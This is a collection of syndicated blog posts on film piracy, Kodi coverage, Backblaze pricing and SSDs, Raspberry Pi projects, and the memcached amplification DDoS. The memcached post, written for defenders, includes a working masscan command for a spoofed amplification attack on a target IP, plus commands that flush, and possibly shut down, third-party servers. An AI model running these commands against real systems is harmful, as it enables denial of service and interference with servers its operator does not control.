
Camcording Piracy is Dropping, But Not In Russia

Post Syndicated from Ernesto original https://torrentfreak.com/camcording-piracy-is-dropping-but-not-in-russia-180311/

The movie industry sees movies that are illegally recorded in theaters as one of the biggest piracy threats worldwide.

To combat this, audio and video watermarking tools are used to detect pirates and their favorite locations. In addition, night-vision goggles and other spy tech are employed to monitor moviegoers during high profile film premieres.

Despite these efforts, so-called ‘cam’ releases of hundreds of films still end up on pirate sites.

In fact, the majority of all new pirated movies that appear online can be traced to a digital recording in a movie theater. This can be the movie itself, the audio, or both. The good news for the movie industry is that the total number seems to be dropping somewhat.

According to statistics gathered by the MPAA, 447 illegal recordings of its members’ movies were detected in 2017. This is down 11% from the year before, when 503 titles were recorded. This suggests that enforcement actions and preventive measures are paying off. However, this is not visible everywhere.

This week Kevin Rosenbaum of the International Intellectual Property Alliance (IIPA), which represents various industry groups including the MPAA, informed the US International Trade Commission that camcording piracy is on the rise in Russia.

In his oral testimony, Rosenbaum signaled three key copyright issues in Russia that deserve attention from the US Government.

“First is to dramatically improve enforcement against online piracy, particularly piracy sites and services directed to users outside of Russia,” Rosenbaum said.

Second, the country has to address the problem of the Russian collecting societies so that music licensing can be handled effectively. These currently lack transparency and good governance, IIPA noted.

The third issue that needs attention is camcording piracy. According to IIPA’s statement, there has been a dramatic increase in illegally recorded movies over the past several years.

“Russia must address the problem of camcording motion pictures, which has risen dramatically over the past three years (200% since 2015) and fuels online piracy,” Rosenbaum noted.

In 2015 the movie industry traced 26 camcorded copies to Russia; by last year this number had increased to 78. These releases are linked to movie theaters around the country, from Moscow and St. Petersburg to Kazan in Tatarstan, and all the way up to Siberia.

The Russian camcording piracy problem was also highlighted in IIPA’s recent Special 301 submission to the US Trade Representative.

“Russia remains the home to some of the world’s most prolific criminal release groups of motion pictures,” IIPA wrote last month. “The illicit camcords that are sourced from Russia are only of fair quality, but they remain in high demand by international criminal syndicates.”

With help from the Russian Anti-Piracy Organization, over a dozen cammers were caught last year. In addition, four criminal cases were launched.

IIPA hopes that these will result in convictions, to create a deterrent effect. In addition, the group highlights that Russia could strengthen its laws, perhaps with a little push from the US.

A copy of Kevin Rosenbaum’s statement before the United States International Trade Commission is available here (pdf). In addition to Russia, it also highlights issues in other countries.


McAfee Security Experts Weigh-in Weirdly With “Fresh Kodi Warning”

Post Syndicated from Andy original https://torrentfreak.com/mcafee-security-experts-weigh-in-weirdly-with-fresh-kodi-warning-180311/

Over the past several years, the last couple in particular, piracy has stormed millions of homes around the world.

From being a widespread but still fairly geeky occupation among torrenters, movie and TV show piracy can now be achieved by anyone with the ability to click a mouse or push a button on a remote control. Much of this mainstream interest can be placed at the feet of the Kodi media player.

An entirely legal platform in its own right, Kodi can be augmented with third-party add-ons that enable users to access an endless supply of streaming media. As such, piracy-configured Kodi installations are operated by an estimated 26 million people, according to the MPAA.

This popularity has led to much interest from tabloid newspapers in the UK which, for reasons best known to them, choose to both promote and demonize Kodi almost every week. While writing about news events is clearly par for the course, when one considers some of the reports, their content, and what inspired them, something doesn’t seem right.

This week The Express, which has published many overly sensational stories about Kodi in recent times, published another. The title – as always – promised something special.

Sounds like big news….

Reading the text, however, reveals nothing new whatsoever. The piece simply rehashes some of the historic claims that have been leveled at Kodi that can easily apply to any Internet-enabled software or system. But beyond that, some of its content is pretty weird.

The piece is centered on comments from two McAfee security experts – Chief Scientist Raj Samani and Chief Consumer Security Evangelist Gary Davis. It’s unclear whether The Express approached them for comment (if they did, there is no actual story for McAfee to comment on) or whether McAfee offered the comments and The Express built a story around them. Either way, here’s a taster.

“Kodi has been pretty open about the fact that it’s a streaming site but my view has always been if I use Netflix I know that I’m not going to get any issues, if I use Amazon I’m not going to get any issues,” Samani told the publication.

Ok, stop right there. Kodi admits that it’s a streaming site? Really? Kodi is a piece of software. It’s a media player. It can do many things but Kodi is not a streaming site and no one at Kodi has ever labeled it otherwise. To think that neither McAfee nor the publication caught that one is a bit embarrassing.

The argument that Samani was trying to make is that services like Netflix and Amazon are generally more reliable than third-party sources and there are few people out there who would argue with that.

“Look, ultimately you’ve got to do the research and you’ve got to decide if it’s right for you but personally I don’t use [Kodi] and I know full well that by not using [Kodi] I’m not going to get any issues. If I pay for the service I know exactly what I’m going to get,” he said.

But unlike his colleague who doesn’t use Kodi, Gary Davis has more experience.

McAfee’s Chief Consumer Security Evangelist admits to having used Kodi in the past but more recently decided not to use it when the security issues apparently got too much for him.

“I did use [Kodi] but turned it off as I started getting worried about some of the risks,” he told The Express.

“You may search for something and you may get what you are looking for but you may get something that you are not looking for and that’s where the problem lies with Kodi.”

This idea, that people search for a movie or TV show yet get something else, is bewildering to most experienced Kodi users. If this were indeed happening on any large scale, people wouldn’t want to use the software anymore. That’s clearly not the case.

Also, incorrect content appearing is not the kind of security threat that the likes of McAfee tend to be worried about. However, Davis suggests things can get worse.

“I’m not saying they’ve done anything wrong but if somebody is able to embed code to turn on a microphone or other things or start sending data to a place it shouldn’t go,” he said.

The sentence appears to have some words missing and struggles to make sense, but the suggestion is that someone’s Kodi installation could be corrupted to the point that an attacker could hijack the user’s microphone.

We are not aware of anything like that ever happening via Kodi. There are instances where something similar has happened in entirely different contexts, without Kodi involved, but that seems neither here nor there. By the same logic, should everyone stop using Windows too?

The big question is why these ‘scary’ Kodi non-stories keep getting published, and why experts are prepared to weigh in on them.

It would be too easy to quickly put it down to some anti-piracy agenda, even though there are plenty of signs that anti-piracy groups have been habitually feeding UK tabloids with information on that front. Indeed, a source at a UK news outlet (that no longer publishes such stories) told TF that they were often prompted to write stories about Kodi and streaming in general, none with a positive spin.

But if it was as simple as that, how does that explain another story run in The Express this week heralding the launch of Kodi’s ‘Leia’ alpha release?

If Kodi is so bad as to warrant an article telling people to avoid it FOREVER on one day, why is it good enough to be promoted on another? It can only come down to the number of clicks – but the clickbait headline should’ve given that away at the start.


Backblaze Cuts B2 Download Price In Half

Post Syndicated from Ahin Thomas original https://www.backblaze.com/blog/backblaze-b2-drops-download-price-in-half/

Backblaze B2 downloads now cost 50% less
Backblaze is pleased to announce that, effective immediately, we are reducing the price of Backblaze B2 Cloud Storage downloads by 50%. This means that B2 download pricing drops from $0.02 to $0.01 per GB. As always, the first gigabyte of data downloaded each day remains free.

If some of this sounds familiar, that’s because a little under a year ago, we dropped our download price from $0.05 to $0.02. While that move solidified our position as the affordability leader in the high performance cloud storage space, we continue to innovate on our platform and are excited to provide this additional value to our customers.

This price reduction applies immediately to all existing and new customers. In keeping with Backblaze’s overall approach to providing services, there are no tiers or minimums. It’s automatic and it starts today.

Why Is Backblaze Lowering What Is Already The Industry’s Lowest Price?

Because it makes cloud storage more useful for more people.

When we decided to use Backblaze B2 as our cloud storage service, their download pricing at the time enabled us to offer our broadcasters unlimited audio uploads so they can upload past decades of preaching to our extensive library for streaming and downloading. With Backblaze cutting the bandwidth prices 50% to just one penny a gigabyte, we are excited about offering much higher quality video. — Ian Wagner, Senior Developer, Sermon Audio

Since our founding in 2007, Backblaze’s mission has been to make storing data astonishingly easy and affordable. We have a well documented, relentless pursuit of lowering storage costs — it starts with our storage pods and runs through everything we do. Today, we have over 500 petabytes of customer data stored. B2’s storage pricing already being 1/4 that of Amazon’s S3 has certainly helped us get there. Today’s pricing reduction puts our download pricing at 1/5 that of S3. The “affordable” part of our story is well established.

I’d like to take a moment to discuss the “easy” part. Our industry has historically done a poor job of putting ourselves in our customers’ shoes. When customers are faced with the decision of where to put their data, price is certainly a factor. But it’s not just the price of storage that customers must consider. There’s a cost to download your data. The business need for providers to charge for this is reasonable — downloading data requires bandwidth, and bandwidth costs money. We discussed that in a prior post on the Cost of Cloud Storage.

But there’s a difference between the costs of bandwidth and what the industry is charging today. There’s a joke that some of the storage clouds are competing to become “Hotel California” — you can check out anytime you want, but your data can never leave.1 Services that make it expensive to restore data or place time lag impediments to data access are reducing the usefulness of your data. Customers should not have to wonder if they can afford to access their own data.

When replacing LTO with StarWind VTL and cloud storage, our customers had only one concern left: the possible cost of data retrieval. Backblaze just wiped this concern out of the way by lowering that cost to just one penny per gig. — Max Kolomyeytsev, Director of Product Management, StarWind

Many businesses have not yet been able to back up their data to the cloud because of the costs. Many of those companies are forced to continue backing up to tape. It is clear that tape is an inefficient means of data storage. Solution providers like StarWind VTL specialize in helping businesses move off of antiquated tape libraries. However, as Max Kolomyeytsev, Director of Product Management at StarWind, points out, “When replacing LTO with StarWind VTL and cloud storage our customers had only one concern left: the possible cost of data retrieval. Backblaze just wiped this concern out of the way by lowering that cost to just one penny per gig.”

Customers that have already adopted the cloud often are forced to make difficult tradeoffs between data they want to access and the cost associated with that access. Surrendering the use of your own data defeats many of the benefits that “the cloud” brings in the first place. Because of B2’s download price, Ian Wagner, a Senior Developer at Sermon Audio, is able to lower his costs and expand his product offering. “When we decided to use Backblaze B2 as our cloud storage service, their download pricing at the time enabled us to offer our broadcasters unlimited audio uploads so they can upload past decades of preaching to our extensive library for streaming and downloading. With Backblaze cutting the bandwidth prices 50% to just one penny a gigabyte, we are excited about offering much higher quality video.”

Better Download Pricing Also Helps Third Party Applications Deliver Customer Solutions

Many organizations use third party applications or devices to help manage their workflows. Those applications are the hub for customers getting their data to where it needs to go. Leaders in verticals like Media Asset Management, Server & NAS Backup, and Enterprise Storage have already chosen to integrate with B2.

With Backblaze lowering their download price to an amazing one penny a gigabyte, our CloudNAS is even a better fit for photographers, videographers and business owners who need to have their files at their fingertips, with an easy, reliable, low cost way to use Backblaze for unlimited primary storage and active archive. — Paul Tian, CEO, Morro Data

For Paul Tian, founder of Ready NAS and CEO of Morro Data, reasonable download pricing also helps his company better serve its customers. “With Backblaze lowering their download price to an amazing one penny a gigabyte, our CloudNAS is even a better fit for photographers, videographers and business owners who need to have their files at their fingertips, with an easy, reliable, low cost way to use Backblaze for unlimited primary storage and active archive.”

If you use an application that hasn’t yet integrated with B2, please ask your provider to add B2 Cloud Storage and mention the application in the comments below.


How Do the Major Cloud Storage Providers Compare on Pricing?

Not only is Backblaze B2 storage 1/4 the price of Amazon S3, Google Cloud, or Azure, but our download pricing is now 1/5 their price as well.

Download price per GB by volume tier:

Pricing Tier   Backblaze B2   Amazon S3   Microsoft Azure   Google Cloud
First 1 TB     $0.01          $0.09       $0.09             $0.12
Next 9 TB      $0.01          $0.09       $0.09             $0.11
Next 40 TB     $0.01          $0.085      $0.09             $0.08
Next 100 TB    $0.01          $0.07       $0.07             $0.08
Next 350 TB    $0.01          $0.05       $0.05             $0.08

Using the chart above, let’s compute a few examples of download costs…

Data Downloaded   Backblaze B2   Amazon S3   Microsoft Azure   Google Cloud
1 terabyte        $10            $90         $90               $120
10 terabytes      $100           $900        $900              $1,200
50 terabytes      $500           $4,300      $4,500            $4,310
500 terabytes     $5,000         $28,800     $29,000           $40,310

Not only is Backblaze B2 pricing dramatically lower, it’s also simple: one price for any amount of data downloaded, to anywhere. In comparison, to compute the cost of downloading 500 TB of data with S3 you start with the following formula:
(($0.09 * 10) + ($0.085 * 40) + ($0.07 * 100) + ($0.05 * 350)) * 1,000
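
If you’d rather script the comparison than expand that formula by hand, below is a small Python sketch of the same tiered computation. It is purely illustrative: the tier boundaries and per-GB prices are copied from the table above and will change as providers update their pricing.

# Illustrative sketch: tiered download cost, using the rates from the table above.
# Each tier is (tier size in TB, price per GB); None means "all remaining data."
S3_TIERS = [(10, 0.09), (40, 0.085), (100, 0.07), (None, 0.05)]
B2_TIERS = [(None, 0.01)]  # one flat rate, no tiers

def download_cost(tb, tiers):
    """Dollars to download `tb` terabytes under a tiered price list (1 TB = 1,000 GB)."""
    remaining_gb = tb * 1000
    cost = 0.0
    for size_tb, price_per_gb in tiers:
        chunk = remaining_gb if size_tb is None else min(remaining_gb, size_tb * 1000)
        cost += chunk * price_per_gb
        remaining_gb -= chunk
        if remaining_gb <= 0:
            break
    return cost

print(download_cost(500, S3_TIERS))  # 28800.0 -> $28,800, matching the formula above
print(download_cost(500, B2_TIERS))  # 5000.0  -> $5,000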
Want to see this comparison for the amount of data you manage?
Use our cloud storage calculator.

Customers Want to Avoid Vendor Lock In

Halving the price of downloads is a crazy move — the kind of crazy our customers will be excited about. When using our Transmit 5 app on the Mac to upload their data to B2 Cloud Storage, our users can sleep soundly knowing they’ll be getting a truly affordable price when they need to restore that data. Cool beans, Backblaze. — Cabel Sasser, Co-Founder, Panic

As the cloud storage industry grows, customers are increasingly concerned with getting locked in to one vendor. No business wants to be fully dependent on one vendor for anything. In addition, customers want multiple copies of their data to mitigate against a vendor outage or other issues.

Many vendors offer the ability for customers to replicate data across “regions.” This enables customers to store data in two physical locations of the customer’s choosing. Of course, customers pay for storing both copies of the data and for the data transfer between regions.

At 1¢ per GB, transferring data out of Backblaze is more affordable than transferring data between most other vendor regions. For example, if a customer is storing data in Amazon S3’s Northern California region (US West) and wants to replicate data to S3 in Northern Virginia (US East), she will pay 2¢ per GB to simply move the data.

However, if that same customer wanted to replicate data from Backblaze B2 to S3 in Northern Virginia, she would pay 1¢ per GB to move the data. She can achieve her replication strategy while also mitigating against vendor risk — all while cutting the bandwidth bill by 50%. Of course, this is also before factoring in the savings on her storage bill, as B2 storage is 1/4 the price of S3.

How Is Backblaze Doing This?

Simple. We just changed our pricing table and updated our website.

The longer answer is that the cost of bandwidth is a function of a few factors, including how it’s being used and the volume of usage. With another year of data for B2, over a decade of experience in the cloud storage industry, and data growth exceeding 100 PB per quarter, we know we can sustainably offer this pricing to our customers; we also know how better download pricing can make our customers and partners more effective in their work. So it is an easy call to make.

Our pricing is simple. Storage is $0.005/GB/month, and downloads cost $0.01/GB. There are no tiers or minimums, and you can get started any time you wish.

Our desire is to provide a great service at a fair price. We’re proud to be the affordability leader in the Cloud Storage space and hope you’ll give us the opportunity to show you what B2 Cloud Storage can enable for you.

Enjoy the service and I’d love to hear what this price reduction does for you in the comments below…or, if you are attending NAB this year, come by to visit and tell us in person!

1 For those readers who don’t get the Eagles reference there, please click here…I promise you won’t regret the next 7 minutes of your life.


Welcome New Support Tech – Matt!

Post Syndicated from Yev original https://www.backblaze.com/blog/welcome-new-support-tech-matt/

Our hiring spree keeps rolling and we have a new addition to the support team, Matt! He joins the team as a Junior Technical Support Rep, and will be helping answer folks’ questions, guiding them through the product, and making sure that everyone’s taken care of! Let’s learn a bit more about Matt, shall we?

What is your Backblaze Title?
Junior Technical Support Representative

Where are you originally from?
San Francisco Bay Area

What attracted you to Backblaze?
Everyone is super chill and I like how transparent everyone is. The culture is very casual and not overbearing.

What do you expect to learn while being at Backblaze?
What the tech industry is like.

Where else have you worked?
The Chairman! Best bao ever.

Where did you go to school?
College of San Mateo.

What’s your dream job?
Being a chef has always interested me. It’s so interesting that we’ve turned food into an art.

Favorite place you’ve traveled?
Japan. Holy crap Japan is cool. Everyone is so polite and the place is so clean. You haven’t had ramen like they serve, I literally couldn’t stop smiling after my first bite. The moment we arrived, I said, “I already miss Japan.”

Favorite hobby?
As much as I like video games, cooking is my favorite. Everyone eats, and it’s a good feeling to make food that people like. Currently trying to figure out how to make Brussels sprouts taste better than Brussels sprouts.

Of what achievement are you most proud?
Meeting my girlfriend. My life turned around when I met her. She’s taught me a lot of things.

Star Trek or Star Wars?
Star Wars!

Coke or Pepsi?
Good ol’ Cola. I quit drinking soda, though.

Favorite food?
As much as I love eating healthy, there’s nothing like spam.

Why do you like certain things?
Because certain things are either fun or delicious.

Anything else you’d like to tell us?
If you have any good recipes, I’ll probably cook them. Or try to.

You’re right Matt, certain things are either fun or delicious, like The Chairman’s bao! Welcome aboard!


Coding is for girls

Post Syndicated from magda original https://www.raspberrypi.org/blog/coding-is-for-girls/

Less than four years ago, Magda Jadach was convinced that programming wasn’t for girls. On International Women’s Day, she tells us how she discovered that it definitely is, and how she embarked on the new career that has brought her to Raspberry Pi as a software developer.

“Coding is for boys”, “in order to be a developer you have to be some kind of super-human”, and “it’s too late to learn how to code” – none of these three things is true, and I am going to prove that to you in this post. By doing this I hope to help some people to get involved in the tech industry and digital making. Programming is for anyone who loves to create and loves to improve themselves.

In the summer of 2014, I started the journey towards learning how to code. I attended my first coding workshop at the recommendation of my boyfriend, who had constantly told me about the skill and how great it was to learn. I was convinced that, at 28 years old, I was already too old to learn. I didn’t have a technical background, I was under the impression that “coding is for boys”, and I lacked the superpowers I was sure I needed. I decided to go to the workshop only to prove him wrong.

Later on, I realised that coding is a skill like any other. You can compare it to learning any language: there’s grammar, vocabulary, and other rules to acquire.


Alien message in console

To my surprise, the workshop was completely inspiring. Within six hours I was able to create my first web page. It was a really simple page with a few cats, some colours, and ‘Hello world’ text. This was a few years ago, but I still remember when I first clicked “view source” to inspect the page. It looked like some strange alien message, as if I’d somehow broken the computer.

I wanted to learn more, but with so many options, I found myself a little overwhelmed. I’d never taught myself any technical skill before, and there was a lot of confusing jargon and new terms to get used to. What was HTML? CSS and JavaScript? What were databases, and how could I connect together all the dots and choose what I wanted to learn? Luckily I had support and was able to keep going.

At times, I felt very isolated. Was I the only girl learning to code? I wasn’t aware of many female role models until I started going to more workshops. I met a lot of great female developers, and thanks to their support and help, I kept coding.

Another struggle I faced was the language barrier. I am not a native speaker of English, and diving into English technical documentation wasn’t easy. The learning curve is daunting in the beginning, but it’s completely normal to feel uncomfortable and to think that you’re really bad at coding. Don’t let this bring you down. Everyone thinks this from time to time.

Play with Raspberry Pi and quit your job

I kept on improving my skills, and my interest in developing grew. However, I had no idea that I could do this for a living; I simply enjoyed coding. Since I had a day job as a journalist, I was learning in the evenings and during the weekends.

I spent long hours playing with a Raspberry Pi and setting up so many different projects to help me understand how the internet and computers work, and get to grips with the basics of electronics. I built my first ever robot buggy, retro game console, and light switch. For the first time in my life, I had a soldering iron in my hand. Day after day I became more obsessed with digital making.

Magdalena Jadach on Twitter: “#solderingiron Where have you been all my life? Weekend with #raspberrypi + @pimoroni + @Pololu + #solder = best time! #electricity”

One day I realised that I couldn’t wait to finish my job and go home to finish some project that I was working on at the time. It was then that I decided to hand over my resignation letter and dive deep into coding.

For the next few months I completely devoted my time to learning new skills and preparing myself for my new career path.

I went for an interview and got my first ever coding internship. Two years, hundreds of lines of code, and thousands of hours spent in front of my computer later, I have landed my dream job at the Raspberry Pi Foundation as a software developer, which proves that dreams come true.


Where to start?

I recommend starting with HTML & CSS – the same path that I chose. It is a relatively straightforward introduction to web development. You can follow my advice or choose a different approach. There is no “right” or “best” way to learn.

Below is a collection of free coding resources, both from Raspberry Pi and from elsewhere, that I think are useful for beginners to know about. There are other tools that you are going to want in your developer toolbox aside from HTML.

  • HTML and CSS are languages for describing, structuring, and styling web pages
  • You can learn JavaScript here and here
  • Raspberry Pi (obviously!) and our online learning projects
  • Scratch is a graphical programming language that lets you drag and combine code blocks to make a range of programs. It’s a good starting point
  • Git is version control software that helps you to work on your own projects and collaborate with other developers
  • Once you’ve got started, you will need a code editor. Sublime Text or Atom are great options for starting out

Coding gives you so much new inspiration: you learn new stuff constantly, and you meet so many amazing people who are willing to help you develop your skills. You can volunteer to help at a Code Club or CoderDojo to increase your exposure to code, or attend a Raspberry Jam to meet other like-minded makers and start your own journey towards becoming a developer.

The post Coding is for girls appeared first on Raspberry Pi.

Some notes on memcached DDoS

Post Syndicated from Robert Graham original http://blog.erratasec.com/2018/03/some-notes-on-memcached-ddos.html

I thought I’d write up some notes on the memcached DDoS. Specifically, I describe how many vulnerable servers I found by scanning the Internet with masscan, and how to use masscan as a killswitch to neuter the worst of the attacks.

Test your servers

I added code to my port scanner for this, then scanned the Internet:
masscan 0.0.0.0/0 -pU:11211 --banners | grep memcached
This example scans the entire Internet (0.0.0.0/0). Replace that with your own address range (or ranges).
This produces output that looks like this:
Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=3935192 time=1520485363 version=1.4.17
Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=399858 time=1520485362 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=29429482 time=1520485363 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=2879363 time=1520485366 version=1.2.6
Banner on port 11211/udp on [memcached] uptime=42083736 time=1520485365 version=1.4.13
The “banners” check keeps only hosts that return valid memcached responses, so you don’t get other stuff that isn’t memcached. To filter this output further, use ‘cut’ to grab just column 6:
... | cut -d ' ' -f 6 | cut -d: -f1
You often get multiple responses to just one query, so you’ll want to sort/uniq the list:
... | sort | uniq

My results from an Internet wide scan

I got 15181 results (or roughly 15,000).
People are using Shodan to find lists of memcached servers. They might be getting back a lot of results that respond on TCP instead of UDP. Only UDP can be used for the attack.

Other researchers scanned the Internet a few days ago and found ~31k. I don’t know if this means people have been removing these from the Internet.

Masscan as exploit script

BTW, you can not only use masscan to find amplifiers, you can also use it to carry out the DDoS. Simply import the list of amplifier IP addresses, then spoof the source address as that of the target. All the responses will go back to the source address.
masscan -iL amplifiers.txt -pU:11211 --spoof-ip <target-ip> --rate 100000
I point this out to show how there’s no magic in exploiting this. Numerous exploit scripts have been released, because it’s so easy.

Why memcached servers are vulnerable

Like many servers, memcached listens on the localhost IP address (127.0.0.1) for local administration. By listening only on the localhost address, remote people cannot talk to the server.
However, this configuration is often buggy, and you end up listening either on 0.0.0.0 (all interfaces) or on one of the external interfaces. There’s a common Linux network stack issue where this keeps happening, such as when trying to get VMs connected to the network. I forget the exact details, but the point is that lots of servers that intend to listen only on localhost end up listening on external interfaces instead. It’s not a good security barrier.
Thus, there are lots of memcached servers listening on their control port (11211) on external interfaces.

How the protocol works

The protocol is documented here. It’s pretty straightforward.
The easiest amplification attack is to send the “stats” command. This is a 15-byte UDP packet that causes the server to send back a large response full of useful statistics about the server. You often see around 10 kilobytes of response across several packets.
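
To make the protocol concrete, here is a minimal Python sketch that sends that “stats” query over UDP, for checking a server you own and are authorized to test (the address below is a placeholder). The 8-byte prefix is memcached’s UDP frame header: request ID, sequence number, datagram count, and a reserved field; it is the same prefix used in the flush_all payload later in this post.

import socket

# Minimal sketch: ask a memcached server you own for its stats over UDP.
def memcached_stats(host, port=11211, timeout=2.0):
    frame = b"\x00\x00\x00\x00\x00\x01\x00\x00"  # request id=0, seq=0, datagram count=1, reserved
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(frame + b"stats\r\n", (host, port))
    try:
        data, _ = sock.recvfrom(65535)  # read only the first response datagram
        return data[8:]                 # strip the 8-byte frame header
    except socket.timeout:
        return None                     # no reply: the UDP port is closed or filtered (good)

print(memcached_stats("192.0.2.10"))  # placeholder address; probe only servers you control

A server that answers here with kilobytes of statistics is exactly the kind of amplifier described above.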
A harder but more effective attack uses a two-step process. You first use the “add” or “set” commands to put chunks of data into the server, then send a “get” command to retrieve them. You can easily put 100 megabytes of data into the server this way, and cause its retrieval with a single “get” command.
That’s why this has been the largest amplification attack ever: a single 100-byte packet can in theory cause a 100-megabyte response.
Doing the math, the 1.3 terabit/second DDoS divided across the 15,000 servers I found vulnerable on the Internet leads to an average of 100-megabits/second per server. This is fairly minor, and is indeed something even small servers (like Raspberry Pis) can generate.

Neutering the attack (“kill switch”)

If they are using the more powerful attack against you, you can neuter it: you can send a “flush_all” command back at the servers who are flooding you, causing them to drop all those large chunks of data from the cache.
I’m going to describe how I would do this.
First, get a list of attackers, meaning the amplifiers that are flooding you. The way to do this is to grab a packet sniffer and capture all packets with a source port of 11211. Here is an example using tcpdump.
tcpdump -i <interface> -w attackers.pcap src port 11211
Let that run for a while, then hit [ctrl-c] to stop, then extract the list of IP addresses in the capture file. The way I do this is with tshark (comes with Wireshark):
tshark -r attackers.pcap -Tfields -e ip.src | sort | uniq > amplifiers.txt
Now, craft a flush_all payload. There are many ways of doing this. For example, if you are using nmap or masscan, you can add the bytes to the nmap-payloads.txt file. Also, masscan can read this directly from a packet capture file. To do this, first craft a packet, such as with the following command line foo:
echo -en "\x00\x00\x00\x00\x00\x01\x00\x00flush_all\r\n" | nc -q1 -u <target-server> 11211
Capture this packet using tcpdump or something, and save it into a file “flush_all.pcap”. If you want to skip this step, I’ve already done it for you; go grab the file from GitHub:
Now that we have our list of attackers (amplifiers.txt) and a payload to blast at them (flush_all.pcap), use masscan to send it:
masscan -iL amplifiers.txt -pU:11211 --pcap-payload flush_all.pcap

Reportedly, “shutdown” may also work to completely shutdown the amplifiers. I’ll leave that as an exercise for the reader, since of course you’ll be adversely affecting the servers.


Voice-controlled magnification glasses

Post Syndicated from Alex Bate original https://www.raspberrypi.org/blog/voice-controlled-magnification-glasses/

Go hands-free in the laboratory or makerspace with Mauro Pichiliani’s voice-controlled magnification glasses.

Voice Controlled Glasses With Magnifying Lens

This video presents the MoveLens project: voice-controlled glasses with a magnifying lens. It was my entry for the Voice Activated contest on Instructables. Check the step-by-step guide at Voice Controlled Glasses With Magnifying Lens. Source code: https://github.com/pichiliani/MoveLens Step by Step guide: https://www.instructables.com/id/Voice-Controlled-Glasses-With-Magnifying-Lens/

It’s a kind of magnification

We’ve all been there – that moment when you need another pair of hands to complete a task. And while these glasses may not hold all the answers, they’re a perfect addition to any hobbyist’s arsenal.

Introducing Mauro Pichiliani’s voice-activated glasses: a pair of frames with magnification lenses that can flip up and down in response to a voice command, depending on the task at hand. No more needing to put down your tools in order to put magnifying glasses on. No more trying to re-position a magnifying glass with the back of your left wrist, or getting grease all over your lenses.

As Mauro explains in his tutorial for the glasses:

Many professionals work for many hours looking at very small areas, such as surgeons, watchmakers, jewellery designers and so on. Most of the time these professionals use some kind of magnification glasses that helps them to see better the area they are working with and other tiny items used on the job. The devices that had magnifications lens on a form factor of a glass usually allow the professional to move the lens out of their eye sight, i.e. put aside the lens. However, in some scenarios touching the lens or the glass rim to move away the lens can contaminate the fingers. Also, it is cumbersome and can break the concentration of the professional.

Voice-controlled magnification glasses

Using a Raspberry Pi Zero W, a servo motor, a microphone, and the IBM Watson speech-to-text service, Mauro built a pair of glasses that lets users control the position of the magnification lenses with voice commands.

Magnification glasses, before modification and addition of Raspberry Pi

The glasses Mauro modified, before he started work on them; you have to move the lenses with your hands, like it’s October 2015

Mauro started by dismantling a pair of standard magnification glasses in order to modify the lens supports to allow them to move freely. He drilled a hole in one of the lens supports to provide a place to attach the servo, and used lollipop sticks and hot glue to fix the lenses relative to one another, so they would both move together under the control of the servo. Then, he set up a Raspberry Pi Zero, installing Raspbian and software to use a USB microphone; after connecting the servo to the Pi Zero’s GPIO pins, he set up the Watson speech-to-text service.

Finally, he wrote the code to bring the project together. Two Python scripts direct the servo to raise and lower the lenses, and a Node.js script captures audio from the microphone, passes it on to Watson, checks for an “up” or “down” command, and calls the appropriate Python script as required.
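
Mauro’s actual scripts are in the GitHub repository linked above. As a rough sketch of what the raise/lower half can look like, here is a short Python example using the gpiozero library; the GPIO pin number and servo positions are illustrative assumptions, not values taken from his code.

from time import sleep
from gpiozero import Servo

servo = Servo(17)  # assumption: the servo's signal wire is on GPIO 17

def lenses_down():
    servo.min()     # swing the lenses down in front of the eyes
    sleep(0.5)      # give the servo time to reach the position
    servo.detach()  # stop sending pulses so the servo doesn't buzz

def lenses_up():
    servo.max()     # flip the lenses up out of the line of sight
    sleep(0.5)
    servo.detach()

if __name__ == "__main__":
    lenses_up()

A speech-to-text front end like the Node.js script described above would then call one of these functions whenever it recognizes an “up” or “down” command.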

Your turn

You can follow the tutorial on the Instructables website, where Mauro entered the glasses into the Instructables Voice Activated Challenge. And if you’d like to take your first steps into digital making using the Raspberry Pi, take a look at our free online projects.


HDD vs SSD: What Does the Future for Storage Hold?

Post Syndicated from Roderick Bauer original https://www.backblaze.com/blog/ssd-vs-hdd-future-of-storage/

SSD 60 TB drive

This is part one of a series. Use the Join button above to receive notification of future posts on this and other topics.

Customers frequently ask us whether and when we plan to move our cloud backup and data storage to SSDs (Solid-State Drives). That’s not a surprising question considering the many advantages SSDs have over magnetic platter type drives, also known as HDDs (Hard-Disk Drives).

We’re a large user of HDDs in our data centers (currently 100,000 hard drives holding over 500 petabytes of data). We want to provide the best performance, reliability, and economy for our cloud backup and cloud storage services, so we continually evaluate which drives to use for operations and in our data centers. While we use SSDs for some applications, which we’ll describe below, there are reasons why HDDs will continue to be the primary drives of choice for us and other cloud providers for the foreseeable future.

HDDs vs SSDs


The laptop computer I am writing this on has a single 512GB SSD, which has become a common feature in higher-end laptops. The advantages of an SSD for a laptop are easy to understand: it is smaller than an HDD, faster, quieter, lasts longer, and is not susceptible to vibration and magnetic fields. It also has much lower latency and access times.

Today’s typical online price for a 2.5” 512GB SSD is $140 to $170 (about $0.27 to $0.33 per GB). The typical online price for a 3.5” 512GB HDD is $44 to $65 (about $0.09 to $0.13 per GB). That’s a pretty significant difference in price, but since the SSD helps make the laptop lighter, enables it to be more resistant to the inevitable shocks and jolts it will experience in daily use, and adds the benefits of faster booting, faster waking from sleep, and faster launching of applications and handling of big files, the extra cost for the SSD in this case is worth it.

Some of these SSD advantages, chiefly speed, also will apply to a desktop computer, so desktops are increasingly outfitted with SSDs, particularly to hold the operating system, applications, and data that is accessed frequently. Replacing a boot drive with an SSD has become a popular upgrade option to breathe new life into a computer, especially one that seems to take forever to boot or is used for notoriously slow-loading applications such as Photoshop.

We covered upgrading your computer with an SSD in our blog post SSD 101: How to Upgrade Your Computer With An SSD.

